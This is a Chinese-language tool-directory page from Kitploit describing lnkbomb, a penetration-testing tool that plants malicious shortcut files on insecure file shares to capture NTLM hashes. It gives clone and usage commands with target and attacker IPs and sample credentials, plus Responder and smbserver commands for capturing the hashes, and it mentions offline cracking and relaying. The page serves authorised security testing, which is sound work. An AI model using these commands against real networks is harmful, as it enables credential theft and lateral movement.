Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
lnkbomb — 用于从不安全的文件共享中收集NTLM哈希的恶意快捷方式生成器。 | Kitploit
工具/GitHubGitHub/dievus/lnkbomb
密码攻击漏洞利用横向移动信息收集渗透测试红队Archived
GitHubdievus/lnkbomb

lnkbomb

用于从不安全的文件共享中收集NTLM哈希的恶意快捷方式生成器。

查看仓库
363621年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Lnkbomb

ko-fi

Lnkbomb 用于向不安全的文件共享上传恶意快捷方式文件。该漏洞存在的原因在于 Windows 会查找与快捷方式文件关联的图标文件。该图标文件可以被指向渗透测试人员运行 Responder 或 smbserver 的机器,从而收集 NTLMv1 或 NTLMv2 哈希(具体取决于受害主机的配置)。测试人员随后可以尝试使用 Hashcat 等工具离线破解收集到的哈希,或将其中继到 ntlmrelayx 等工具进行进一步利用。

载荷文件直接上传到测试人员在命令行中指定的不安全文件共享。测试人员还需提供其 IP 地址,该地址会被写入载荷中。

2.0 版本对该工具进行了全面重构,并使用了 pysmb 库,支持未经身份验证和经过身份验证的载荷投放。

Python 使用方法

安装 Lnkbomb

请注意,该项目在 Windows 下运行稳定。在 Linux 下可能存在问题。

git clone https://github.com/dievus/lnkbomb.git

切换到 lnkbomb 目录并运行:

python3 lnkbomb.py -h

这将输出帮助菜单,其中包含以下标志:

-h, --help - 列出帮助选项

-t, --target - 指定目标 IP 地址

-a, --attacker - 指定测试人员攻击机的 IP 地址

-r, --recover - 用于在测试完成后移除载荷(例如 -r payloadname.url)

-w, --windows - 新命令 - 用于设置 Windows 共享的适当端口

-l, --linux - 新命令 - 用于设置 Linux 共享的适当端口

-n, --netbios - 新命令 - 必须包含目标 Windows 机器的 NetBIOS 名称

完整命令示例包括:

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url

你需要使用 Responder 或 smbserver 等工具来捕获 NTLM 哈希。
responder -I eth0 -dwFP -v

或

smbserver.py . . -smb2support

注意事项

请记住,本工具仅用于道德黑客和渗透测试目的。我不赞同任何对未经授权目标进行测试的行为。

本工具是否有效取决于目标系统的补丁和版本。用户体验可能有所不同。

我知道它是 .url 快捷方式而非 .lnk 扩展名。我故意这么写来刺激你。

下载工具